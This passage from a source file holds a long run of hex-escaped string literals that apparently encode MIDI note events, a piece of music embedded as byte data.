"\x13\x2d\x51\x29\x2d\x00\x81\x0c\x2b\x51\x64\x2b\x00\x81\x0c\x2b\x51\x00\x1f\x51".
"\x64\x2b\x00\x00\x1f\x00\x13\x30\x57\x65\x30\x00\x13\x40\x56\x00\x3c\x56\x01\x37".
"\x56\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x2b\x54\x65\x2b\x00\x13\x40\x51\x00".
"\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30\x51\x65\x30\x00".
"\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x2b".
"\x54\x65\x2b\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00".
"\x37\x00\x13\x30\x54\x65\x30\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00".
"\x00\x3c\x00\x00\x37\x00\x13\x2b\x54\x65\x2b\x00\x13\x40\x54\x00\x3c\x54\x01\x37".
"\x54\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30\x54\x65\x30\x00\x13\x40\x54\x00".
"\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x2b\x54\x65\x2b\x00".
"\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30".
"\x54\x65\x30\x00\x13\x41\x54\x00\x3b\x54\x01\x37\x54\x64\x41\x00\x00\x3b\x00\x00".
"\x37\x00\x13\x2b\x57\x65\x2b\x00\x13\x41\x57\x00\x3b\x57\x01\x37\x57\x64\x41\x00".
"\x00\x3b\x00\x00\x37\x00\x13\x30\x57\x65\x30\x00\x13\x40\x58\x00\x3c\x58\x01\x37".
"\x58\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x31\x5a\x65\x31\x00\x13\x43\x5d\x00".
"\x3a\x5d\x65\x43\x00\x00\x3a\x00\x13\x32\x60\x65\x32\x00\x13\x43\x63\x00\x3e\x63".
"\x01\x3b\x63\x64\x43\x00\x00\x3e\x00\x00\x3b\x00\x13\x32\x66\x65\x32\x00\x13\x42".
"\x66\x00\x3e\x66\x01\x3c\x66\x64\x42\x00\x00\x3e\x00\x00\x3c\x00\x13\x43\x66\x00".
"\x3e\x66\x00\x37\x66\x65\x37\x00\x13\x35\x66\x29\x35\x00\x13\x32\x66\x65\x32\x00".
"\x13\x2f\x63\x29\x43\x00\x00\x3e\x00\x00\x2f\x00\x13\x2b\x62\x65\x2b\x00\x14\x30".
"\x5d\x64\x30\x00\x13\x41\x5d\x00\x3c\x5d\x01\x37\x5d\x64\x41\x00\x00\x3c\x00\x00".
"\x37\x00\x13\x2b\x5a\x65\x2b\x00\x13\x40\x5a\x00\x3c\x5a\x01\x37\x5a\x64\x40\x00".
"\x00\x3c\x00\x00\x37\x00\x13\x30\x57\x65\x30\x00\x13\x40\x57\x00\x3c\x57\x01\x37".
"\x57\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x2b\x54\x65\x2b\x00\x13\x40\x54\x00".
"\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30\x51\x65\x30\x00".
"\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x31".
"\x51\x65\x31\x00\x13\x40\x54\x00\x39\x54\x65\x40\x00\x00\x39\x00\x13\x30\x54\x65".
"\x30\x00\x13\x3e\x54\x00\x39\x54\x01\x35\x54\x64\x3e\x00\x00\x39\x00\x00\x35\x00".
"\x13\x35\x54\x65\x35\x00\x13\x3e\x54\x00\x39\x54\x65\x3e\x00\x00\x39\x00\x13\x3f".
"\x54\x00\x3c\x54\x01\x39\x54\x00\x36\x54\x64\x3f\x00\x00\x3c\x00\x00\x39\x00\x00".
"\x36\x00\x81\x0c\x3f\x51\x00\x3c\x51\x00\x39\x51\x00\x36\x51\x64\x3f\x00\x00\x3c".
"\x00\x00\x39\x00\x00\x36\x00\x81\x0c\x40\x54\x00\x3c\x54\x00\x37\x54\x64\x40\x00".
"\x00\x3c\x00\x00\x37\x00\x13\x39\x54\x00\x2d\x54\x65\x39\x00\x00\x2d\x00\x13\x2d".
"\x54\x00\x21\x54\x81\x5d\x2d\x00\x00\x21\x00\x13\x32\x54\x00\x26\x54\x65\x32\x00".
"\x00\x26\x00\x13\x37\x54\x00\x2b\x54\x65\x37\x00\x00\x2b\x00\x13\x2b\x57\x00\x1f".
"\x57\x81\x5d\x2b\x00\x00\x1f\x00\x13\x30\x57\x00\x24\x57\x65\x30\x00\x00\x24\x00".
"\x81\x0c\x30\x54\x00\x24\x54\x64\x30\x00\x00\x24\x00\x81\x0c\x29\x57\x64\x29\x00".
"\x13\x41\x5a\x00\x3c\x5a\x01\x39\x5a\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x2d".
"\x5a\x65\x2d\x00\x13\x41\x5a\x00\x3c\x5a\x01\x39\x5a\x64\x41\x00\x00\x3c\x00\x00".
"\x39\x00\x13\x30\x5d\x65\x30\x00\x13\x40\x5d\x00\x3c\x5d\x01\x37\x5d\x64\x40\x00".
"\x00\x3c\x00\x00\x37\x00\x13\x34\x5d\x65\x34\x00\x13\x40\x5d\x00\x3c\x5d\x01\x37".
"\x5d\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x2b\x5d\x65\x2b\x00\x13\x41\x5d\x00".
"\x3b\x5d\x01\x37\x5d\x64\x41\x00\x00\x3b\x00\x00\x37\x00\x13\x2f\x5a\x65\x2f\x00".
"\x13\x41\x5a\x00\x3b\x5a\x01\x37\x5a\x64\x41\x00\x00\x3b\x00\x00\x37\x00\x13\x30".
"\x57\x65\x30\x00\x13\x40\x57\x00\x3c\x57\x01\x37\x57\x64\x40\x00\x00\x3c\x00\x00".
"\x37\x00\x13\x30\x54\x65\x30\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00".
"\x00\x3c\x00\x00\x37\x00\x13\x29\x54\x65\x29\x00\x13\x41\x54\x00\x3c\x54\x01\x39".
"\x54\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x2d\x54\x65\x2d\x00\x13\x41\x54\x00".
"\x3c\x54\x01\x39\x54\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x30\x54\x65\x30\x00".
"\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x34".
"\x54\x65\x34\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00".
"\x37\x00\x13\x39\x54\x00\x2d\x54\x65\x39\x00\x00\x2d\x00\x13\x40\x57\x00\x3c\x57".
"\x01\x39\x57\x64\x40\x00\x00\x3c\x00\x00\x39\x00\x13\x35\x57\x00\x29\x57\x65\x35".
"\x00\x00\x29\x00\x13\x35\x57\x00\x29\x57\x65\x35\x00\x00\x29\x00\x13\x34\x5a\x00".
"\x28\x5a\x65\x34\x00\x00\x28\x00\x81\x0c\x3c\x60\x00\x30\x60\x81\x5c\x3c\x00\x00".
"\x30\x00\x13\x29\x60\x65\x29\x00\x13\x41\x5d\x00\x3c\x5d\x01\x39\x5d\x64\x41\x00".
"\x00\x3c\x00\x00\x39\x00\x13\x2d\x5a\x65\x2d\x00\x13\x41\x5a\x00\x3c\x5a\x01\x39".
"\x5a\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x30\x5a\x65\x30\x00\x13\x40\x5a\x00".
"\x3c\x5a\x01\x37\x5a\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x34\x5a\x65\x34\x00".
"\x13\x40\x57\x00\x3c\x57\x01\x37\x57\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30".
"\x57\x65\x30\x00\x13\x41\x57\x00\x3b\x57\x01\x37\x57\x64\x41\x00\x00\x3b\x00\x00".
"\x37\x00\x13\x34\x57\x65\x34\x00\x13\x41\x57\x00\x3b\x57\x01\x37\x57\x64\x41\x00".
"\x00\x3b\x00\x00\x37\x00\x13\x30\x57\x65\x30\x00\x13\x40\x57\x00\x3c\x57\x01\x37".
"\x57\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x34\x57\x65\x34\x00\x13\x40\x57\x00".
"\x3c\x57\x01\x37\x57\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30\x54\x65\x30\x00".
"\x13\x3e\x54\x00\x3c\x54\x01\x39\x54\x64\x3e\x00\x00\x3c\x00\x00\x39\x00\x13\x35".
"\x54\x65\x35\x00\x13\x3f\x54\x00\x3c\x54\x01\x39\x54\x64\x3f\x00\x00\x3c\x00\x00".
"\x39\x00\x13\x37\x54\x65\x37\x00\x13\x40\x54\x00\x3c\x54\x65\x40\x00\x00\x3c\x00".
"\x13\x34\x54\x65\x34\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c".
"\x00\x00\x37\x00\x13\x32\x54\x65\x32\x00\x13\x3e\x54\x00\x37\x54\x65\x3e\x00\x00".
"\x37\x00\x13\x37\x51\x00\x2b\x51\x81\x5d\x37\x00\x00\x2b\x00\x13\x30\x51\x00\x24".
"\x51\x65\x30\x00\x00\x24\x00\x82\x7c\x29\x51\x64\x29\x00\x13\x41\x51\x00\x3c\x51".
"\x01\x39\x51\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x2d\x54\x65\x2d\x00\x13\x41".
"\x54\x00\x3c\x54\x01\x39\x54\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x30\x54\x65".
"\x30\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00\x37\x00".
"\x13\x34\x54\x65\x34\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c".
"\x00\x00\x37\x00\x13\x2b\x54\x65\x2b\x00\x13\x41\x54\x00\x3b\x54\x01\x37\x54\x64".
"\x41\x00\x00\x3b\x00\x00\x37\x00\x13\x2f\x54\x65\x2f\x00\x13\x41\x54\x00\x3b\x54".
"\x01\x37\x54\x64\x41\x00\x00\x3b\x00\x00\x37\x00\x13\x30\x54\x65\x30\x00\x13\x40".
"\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30\x54\x65".
"\x30\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00\x37\x00".
"\x13\x29\x54\x65\x29\x00\x13\x41\x54\x00\x3c\x54\x01\x39\x54\x64\x41\x00\x00\x3c".
"\x00\x00\x39\x00\x13\x2d\x54\x65\x2d\x00\x13\x41\x54\x00\x3c\x54\x01\x39\x54\x64".
"\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x30\x54\x65\x30\x00\x13\x40\x54\x00\x3c\x54".
"\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x34\x54\x65\x34\x00\x13\x40".
"\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x39\x57\x00".
"\x2d\x57\x65\x39\x00\x00\x2d\x00\x13\x40\x57\x00\x3c\x57\x01\x39\x57\x64\x40\x00".
"\x00\x3c\x00\x00\x39\x00\x13\x35\x57\x00\x29\x57\x65\x35\x00\x00\x29\x00\x13\x35".
"\x57\x00\x29\x57\x65\x35\x00\x00\x29\x00\x13\x34\x57\x00\x28\x57\x65\x34\x00\x00".
"\x28\x00\x81\x0c\x3c\x57\x00\x30\x57\x81\x5c\x3c\x00\x00\x30\x00\x13\x29\x51\x65".
"\x29\x00\x13\x41\x51\x00\x3c\x51\x01\x39\x51\x64\x41\x00\x00\x3c\x00\x00\x39\x00".
"\x13\x2d\x51\x65\x2d\x00\x13\x41\x51\x00\x3c\x51\x01\x39\x51\x64\x41\x00\x00\x3c".
"\x00\x00\x39\x00\x13\x30\x51\x65\x30\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64".
"\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x34\x51\x65\x34\x00\x13\x40\x51\x00\x3c\x51".
"\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30\x51\x65\x30\x00\x13\x41".
"\x51\x00\x3b\x51\x01\x37\x51\x64\x41\x00\x00\x3b\x00\x00\x37\x00\x13\x34\x51\x65".
"\x34\x00\x13\x41\x51\x00\x3b\x51\x01\x37\x51\x64\x41\x00\x00\x3b\x00\x00\x37\x00".
"\x13\x30\x51\x65\x30\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c".
"\x00\x00\x37\x00\x13\x34\x52\x65\x34\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64".
"\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30\x54\x65\x30\x00\x13\x3e\x54\x00\x3c\x54".
"\x01\x39\x54\x64\x3e\x00\x00\x3c\x00\x00\x39\x00\x13\x35\x54\x65\x35\x00\x13\x3f".
"\x54\x00\x3c\x54\x01\x39\x54\x64\x3f\x00\x00\x3c\x00\x00\x39\x00\x13\x37\x51\x65".
"\x37\x00\x13\x40\x51\x00\x3c\x51\x65\x40\x00\x00\x3c\x00\x13\x34\x51\x65\x34\x00".
"\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x32".
"\x51\x65\x32\x00\x13\x3e\x51\x00\x37\x51\x65\x3e\x00\x00\x37\x00\x13\x37\x51\x00".
"\x2b\x51\x81\x5d\x37\x00\x00\x2b\x00\x13\x30\x51\x00\x24\x51\x65\x30\x00\x00\x24".
"\x00\x81\x0c\x30\x51\x00\x24\x51\x64\x30\x00\x00\x24\x00\x81\x0c\x38\x54\x00\x2c".
"\x54\x64\x38\x00\x00\x2c\x00\x13\x3c\x54\x00\x38\x54\x01\x33\x54\x64\x3c\x00\x00".
"\x38\x00\x00\x33\x00\x13\x33\x54\x00\x27\x54\x65\x33\x00\x00\x27\x00\x13\x3c\x54".
"\x00\x38\x54\x01\x33\x54\x64\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x38\x51\x00\x2c".
"\x51\x65\x38\x00\x00\x2c\x00\x13\x3c\x4e\x00\x38\x4e\x01\x33\x4e\x64\x3c\x00\x00".
"\x38\x00\x00\x33\x00\x13\x33\x4e\x00\x27\x4e\x65\x33\x00\x00\x27\x00\x13\x3c\x4e".
"\x00\x38\x4e\x01\x33\x4e\x64\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x31\x4e\x00\x27".
"\x4e\x65\x31\x00\x00\x27\x00\x13\x3d\x4e\x00\x38\x4e\x01\x35\x4e\x64\x3d\x00\x00".
"\x38\x00\x00\x35\x00\x13\x31\x4e\x00\x25\x4e\x65\x31\x00\x00\x25\x00\x13\x3d\x4e".
"\x00\x38\x4e\x01\x35\x4e\x64\x3d\x00\x00\x38\x00\x00\x35\x00\x13\x38\x4e\x00\x2c".
"\x4e\x65\x38\x00\x00\x2c\x00\x13\x3c\x4e\x00\x38\x4e\x01\x33\x4e\x64\x3c\x00\x00".
"\x38\x00\x00\x33\x00\x13\x33\x4e\x00\x27\x4e\x65\x33\x00\x00\x27\x00\x13\x3c\x4e".
"\x00\x38\x4e\x01\x33\x4e\x64\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x3a\x4e\x00\x2e".
"\x4e\x65\x3a\x00\x00\x2e\x00\x13\x3c\x4e\x00\x38\x4e\x01\x33\x4e\x64\x3c\x00\x00".
"\x38\x00\x00\x33\x00\x13\x33\x4e\x00\x27\x4e\x65\x33\x00\x00\x27\x00\x13\x3c\x4e".
"\x00\x38\x4e\x01\x33\x4e\x64\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x38\x50\x00\x2c".
"\x50\x65\x38\x00\x00\x2c\x00\x13\x3c\x51\x00\x38\x51\x01\x33\x51\x64\x3c\x00\x00".
"\x38\x00\x00\x33\x00\x13\x33\x51\x00\x27\x51\x65\x33\x00\x00\x27\x00\x13\x3c\x51".
"\x00\x38\x51\x01\x33\x51\x64\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x31\x51\x00\x25".
"\x51\x65\x31\x00\x00\x25\x00\x13\x2e\x51\x00\x22\x51\x65\x2e\x00\x00\x22\x00\x13".
"\x33\x51\x00\x27\x51\x65\x33\x00\x00\x27\x00\x13\x3a\x51\x00\x37\x51\x01\x33\x51".
"\x64\x3a\x00\x00\x37\x00\x00\x33\x00\x13\x3c\x51\x00\x38\x51\x65\x3c\x00\x00\x38".
"\x00\x82\x7c\x34\x54\x64\x34\x00\x13\x3b\x54\x00\x38\x54\x65\x3b\x00\x00\x38\x00".
"\x13\x34\x54\x65\x34\x00\x13\x3b\x54\x00\x38\x54\x65\x3b\x00\x00\x38\x00\x13\x33".
"\x54\x65\x33\x00\x13\x3b\x54\x00\x36\x54\x65\x3b\x00\x00\x36\x00\x13\x2e\x57\x65".
"\x2e\x00\x13\x3b\x57\x00\x36\x57\x01\x34\x57\x64\x3b\x00\x00\x36\x00\x00\x34\x00".
"\x13\x2a\x5a\x00\x34\x5a\x65\x2a\x00\x00\x34\x00\x13\x3a\x5a\x00\x36\x5a\x65\x3a".
"\x00\x00\x36\x00\x13\x2a\x5d\x65\x2a\x00\x13\x3a\x5d\x00\x36\x5d\x01\x34\x5d\x64".
"\x3a\x00\x00\x36\x00\x00\x34\x00\x13\x3b\x5a\x00\x36\x5a\x00\x33\x5a\x00\x2f\x5a".
"\x65\x3b\x00\x00\x36\x00\x00\x33\x00\x00\x2f\x00\x82\x7c\x33\x54\x64\x33\x00\x13".
"\x3b\x54\x00\x38\x54\x65\x3b\x00\x00\x38\x00\x13\x33\x51\x65\x33\x00\x13\x3b\x51".
"\x00\x38\x51\x65\x3b\x00\x00\x38\x00\x13\x33\x54\x65\x33\x00\x13\x3c\x54\x00\x38".
"\x54\x65\x3c\x00\x00\x38\x00\x13\x33\x54\x65\x33\x00\x13\x3c\x54\x00\x38\x54\x65".
"\x3c\x00\x00\x38\x00\x13\x33\x52\x00\x27\x52\x65\x33\x00\x00\x27\x00\x13\x3d\x51".
"\x00\x37\x51\x01\x33\x51\x64\x3d\x00\x00\x37\x00\x00\x33\x00\x13\x33\x51\x00\x27".
"\x51\x65\x33\x00\x00\x27\x00\x13\x3d\x51\x00\x37\x51\x01\x33\x51\x64\x3d\x00\x00".
"\x37\x00\x00\x33\x00\x13\x3c\x51\x00\x38\x51\x65\x3c\x00\x00\x38\x00\x82\x7c\x38".
"\x54\x00\x2c\x54\x64\x38\x00\x00\x2c\x00\x13\x3c\x54\x00\x38\x54\x01\x33\x54\x64".
"\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x33\x54\x00\x27\x54\x65\x33\x00\x00\x27\x00".
"\x13\x3c\x54\x00\x38\x54\x01\x33\x54\x64\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x38".
"\x54\x00\x2c\x54\x65\x38\x00\x00\x2c\x00\x13\x3c\x54\x00\x38\x54\x01\x33\x54\x64".
"\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x33\x54\x00\x27\x54\x65\x33\x00\x00\x27\x00".
"\x13\x3c\x56\x00\x38\x56\x01\x33\x56\x64\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x31".
"\x57\x00\x27\x57\x65\x31\x00\x00\x27\x00\x13\x3d\x57\x00\x38\x57\x01\x35\x57\x64".
"\x3d\x00\x00\x38\x00\x00\x35\x00\x13\x31\x57\x00\x25\x57\x65\x31\x00\x00\x25\x00".
"\x13\x3d\x57\x00\x38\x57\x01\x35\x57\x64\x3d\x00\x00\x38\x00\x00\x35\x00\x13\x38".
"\x57\x00\x2c\x57\x65\x38\x00\x00\x2c\x00\x13\x3c\x57\x00\x38\x57\x01\x33\x57\x64".
"\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x33\x57\x00\x27\x57\x65\x33\x00\x00\x27\x00".
"\x13\x3c\x57\x00\x38\x57\x01\x33\x57\x64\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x3a".
"\x57\x00\x2e\x57\x65\x3a\x00\x00\x2e\x00\x13\x3c\x57\x00\x38\x57\x01\x33\x57\x64".
"\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x33\x57\x00\x27\x57\x65\x33\x00\x00\x27\x00".
"\x13\x3c\x57\x00\x38\x57\x01\x33\x57\x64\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x38".
"\x57\x00\x2c\x57\x65\x38\x00\x00\x2c\x00\x13\x3c\x57\x00\x38\x57\x01\x33\x57\x64".
"\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x33\x57\x00\x27\x57\x65\x33\x00\x00\x27\x00".
"\x13\x3c\x57\x00\x38\x57\x01\x33\x57\x64\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x31".
"\x57\x00\x25\x57\x65\x31\x00\x00\x25\x00\x13\x2e\x57\x00\x22\x57\x65\x2e\x00\x00".
"\x22\x00\x13\x33\x57\x00\x27\x57\x65\x33\x00\x00\x27\x00\x13\x3a\x57\x00\x37\x57".
"\x01\x33\x57\x64\x3a\x00\x00\x37\x00\x00\x33\x00\x13\x3c\x54\x00\x38\x54\x65\x3c".
"\x00\x00\x38\x00\x82\x7c\x34\x4e\x64\x34\x00\x13\x3b\x4e\x00\x38\x4e\x65\x3b\x00".
"\x00\x38\x00\x13\x34\x4e\x65\x34\x00\x13\x3b\x4e\x00\x38\x4e\x65\x3b\x00\x00\x38".
"\x00\x13\x33\x4e\x65\x33\x00\x13\x3b\x4e\x00\x36\x4e\x65\x3b\x00\x00\x36\x00\x13".
"\x2e\x4e\x65\x2e\x00\x13\x3b\x4e\x00\x36\x4e\x01\x34\x4e\x64\x3b\x00\x00\x36\x00".
"\x00\x34\x00\x13\x2a\x4e\x00\x34\x4e\x65\x2a\x00\x00\x34\x00\x13\x3a\x4e\x00\x36".
"\x4e\x65\x3a\x00\x00\x36\x00\x13\x2a\x4e\x65\x2a\x00\x13\x3a\x4e\x00\x36\x4e\x01".
"\x34\x4e\x64\x3a\x00\x00\x36\x00\x00\x34\x00\x13\x3b\x4e\x00\x36\x4e\x00\x33\x4e".
"\x00\x2f\x4e\x65\x3b\x00\x00\x36\x00\x00\x33\x00\x00\x2f\x00\x82\x7c\x33\x51\x64".
"\x33\x00\x13\x3b\x51\x00\x38\x51\x65\x3b\x00\x00\x38\x00\x13\x33\x51\x65\x33\x00".
"\x13\x3b\x51\x00\x38\x51\x65\x3b\x00\x00\x38\x00\x13\x33\x51\x65\x33\x00\x13\x3c".
"\x51\x00\x38\x51\x65\x3c\x00\x00\x38\x00\x13\x33\x51\x65\x33\x00\x13\x3c\x51\x00".
"\x38\x51\x65\x3c\x00\x00\x38\x00\x13\x33\x54\x00\x27\x54\x65\x33\x00\x00\x27\x00".
"\x13\x3d\x54\x00\x37\x54\x01\x33\x54\x64\x3d\x00\x00\x37\x00\x00\x33\x00\x13\x33".
"\x54\x00\x27\x54\x65\x33\x00\x00\x27\x00\x13\x3d\x54\x00\x37\x54\x01\x33\x54\x64".
"\x3d\x00\x00\x37\x00\x00\x33\x00\x13\x3c\x54\x00\x38\x54\x65\x3c\x00\x00\x38\x00".
"\x81\x0c\x3d\x54\x00\x38\x54\x00\x35\x54\x00\x31\x54\x81\x5c\x3d\x00\x00\x38\x00".
"\x00\x35\x00\x00\x31\x00\x13\x3c\x54\x00\x39\x54\x00\x35\x54\x00\x30\x54\x65\x3c".
"\x00\x00\x39\x00\x00\x35\x00\x00\x30\x00\x13\x41\x54\x00\x35\x54\x81\x21\x41\x00".
"\x00\x35\x00\x13\x40\x54\x00\x34\x54\x29\x40\x00\x00\x34\x00\x13\x3e\x54\x00\x32".
"\x54\x29\x3e\x00\x00\x32\x00\x13\x3c\x54\x00\x30\x54\x29\x3c\x00\x00\x30\x00\x13".
"\x34\x54\x00\x28\x54\x29\x34\x00\x00\x28\x00\x13\x35\x51\x00\x29\x51\x29\x35\x00".
"\x00\x29\x00\x13\x37\x51\x00\x2b\x51\x81\x21\x37\x00\x00\x2b\x00\x13\x30\x51\x00".
"\x24\x51\x29\x30\x00\x00\x24\x00\x13\x32\x51\x00\x26\x51\x29\x32\x00\x00\x26\x00".
"\x13\x34\x51\x00\x28\x51\x29\x34\x00\x00\x28\x00\x13\x35\x51\x00\x29\x51\x65\x35".
"\x00\x00\x29\x00\x13\x31\x51\x00\x25\x51\x81\x5d\x31\x00\x00\x25\x00\x13\x31\x51".
"\x00\x25\x51\x65\x31\x00\x00\x25\x00\x13\x35\x51\x00\x29\x51\x65\x35\x00\x00\x29".
"\x00\x81\x0c\x29\x51\x00\x1d\x51\x64\x29\x00\x00\x1d\x00\x81\x0c\x34\x4c\x64\x34".
"\x00\x13\x3c\x46\x00\x3a\x46\x01\x37\x46\x64\x3c\x00\x00\x3a\x00\x00\x37\x00\x13".
"\x34\x40\x65\x34\x00\x13\x3c\x3a\x00\x3a\x3a\x01\x37\x3a\x64\x3c\x00\x00\x3a\x00".
"\x00\x37\x00\x13\x34\x3a\x65\x34\x00\x13\x3c\x37\x00\x3a\x37\x01\x37\x37\x64\x3c".
"\x00\x00\x3a\x00\x00\x37\x00\x13\x34\x34\x65\x34\x00\x13\x3c\x34\x00\x3a\x34\x01".
"\x37\x34\x64\x3c\x00\x00\x3a\x00\x00\x37\x00\x13\x34\x34\x65\x34\x00\x13\x3c\x34".
"\x00\x39\x34\x65\x3c\x00\x00\x39\x00\x13\x30\x34\x65\x30\x00\x13\x3c\x37\x00\x39".
"\x37\x65\x3c\x00\x00\x39\x00\x13\x34\x37\x65\x34\x00\x13\x3c\x37\x00\x39\x37\x65".
"\x3c\x00\x00\x39\x00\x13\x30\x37\x65\x30\x00\x13\x3c\x37\x00\x39\x37\x65\x3c\x00".
"\x00\x39\x00\x13\x37\x37\x65\x37\x00\x13\x40\x37\x00\x3c\x37\x01\x3a\x37\x64\x40".
"\x00\x00\x3c\x00\x00\x3a\x00\x13\x30\x37\x65\x30\x00\x13\x40\x37\x00\x3c\x37\x01".
"\x3a\x37\x64\x40\x00\x00\x3c\x00\x00\x3a\x00\x13\x37\x37\x65\x37\x00\x13\x40\x37".
"\x00\x3c\x37\x01\x3a\x37\x64\x40\x00\x00\x3c\x00\x00\x3a\x00\x13\x30\x37\x65\x30".
"\x00\x13\x40\x37\x00\x3c\x37\x01\x3a\x37\x64\x40\x00\x00\x3c\x00\x00\x3a\x00\x13".
"\x35\x37\x65\x35\x00\x13\x41\x37\x00\x3c\x37\x01\x39\x37\x64\x41\x00\x00\x3c\x00".
"\x00\x39\x00\x13\x30\x38\x65\x30\x00\x13\x41\x37\x00\x3c\x37\x01\x39\x37\x64\x41".
"\x00\x00\x3c\x00\x00\x39\x00\x13\x35\x37\x65\x35\x00\x13\x41\x37\x00\x3c\x37\x01".
"\x39\x37\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x30\x37\x65\x30\x00\x13\x41\x37".
"\x00\x3c\x37\x01\x39\x37\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x34\x37\x65\x34".
"\x00\x13\x3c\x37\x00\x3a\x37\x01\x37\x37\x64\x3c\x00\x00\x3a\x00\x00\x37\x00\x13".
"\x30\x37\x65\x30\x00\x13\x3c\x37\x00\x3a\x37\x01\x37\x37\x64\x3c\x00\x00\x3a\x00".
"\x00\x37\x00\x13\x34\x37\x65\x34\x00\x13\x3c\x37\x00\x3a\x37\x01\x37\x37\x64\x3c".
"\x00\x00\x3a\x00\x00\x37\x00\x13\x30\x37\x65\x30\x00\x13\x3c\x37\x00\x3a\x37\x01".
"\x37\x37\x64\x3c\x00\x00\x3a\x00\x00\x37\x00\x13\x32\x37\x65\x32\x00\x13\x3c\x37".
"\x00\x39\x37\x65\x3c\x00\x00\x39\x00\x13\x30\x37\x65\x30\x00\x13\x3c\x3a\x00\x39".
"\x3a\x65\x3c\x00\x00\x39\x00\x13\x32\x3a\x65\x32\x00\x13\x3c\x3d\x00\x39\x3d\x65".
"\x3c\x00\x00\x39\x00\x13\x30\x3d\x65\x30\x00\x13\x3c\x3d\x00\x39\x3d\x65\x3c\x00".
"\x00\x39\x00\x13\x31\x40\x65\x31\x00\x13\x3b\x43\x00\x38\x43\x01\x35\x43\x64\x3b".
"\x00\x00\x38\x00\x00\x35\x00\x13\x31\x46\x65\x31\x00\x13\x3b\x49\x00\x38\x49\x01".
"\x35\x49\x64\x3b\x00\x00\x38\x00\x00\x35\x00\x13\x30\x4c\x65\x30\x00\x13\x3c\x4e".
"\x00\x39\x4e\x01\x35\x4e\x64\x3c\x00\x00\x39\x00\x00\x35\x00\x13\x30\x51\x65\x30".
"\x00\x13\x40\x51\x00\x3c\x51\x01\x39\x51\x64\x40\x00\x00\x3c\x00\x00\x39\x00\x13".
"\x30\x51\x65\x30\x00\x13\x40\x51\x00\x3c\x51\x01\x3a\x51\x64\x40\x00\x00\x3c\x00".
"\x00\x3a\x00\x13\x30\x51\x65\x30\x00\x13\x40\x51\x00\x3c\x51\x01\x3a\x51\x64\x40".
"\x00\x00\x3c\x00\x00\x3a\x00\x13\x40\x51\x00\x3c\x51\x00\x39\x51\x00\x35\x51\x65".
"\x40\x00\x00\x3c\x00\x00\x39\x00\x00\x35\x00\x82\x7c\x34\x4e\x64\x34\x00\x13\x3c".
"\x4e\x00\x3a\x4e\x01\x37\x4e\x64\x3c\x00\x00\x3a\x00\x00\x37\x00\x13\x34\x4c\x65".
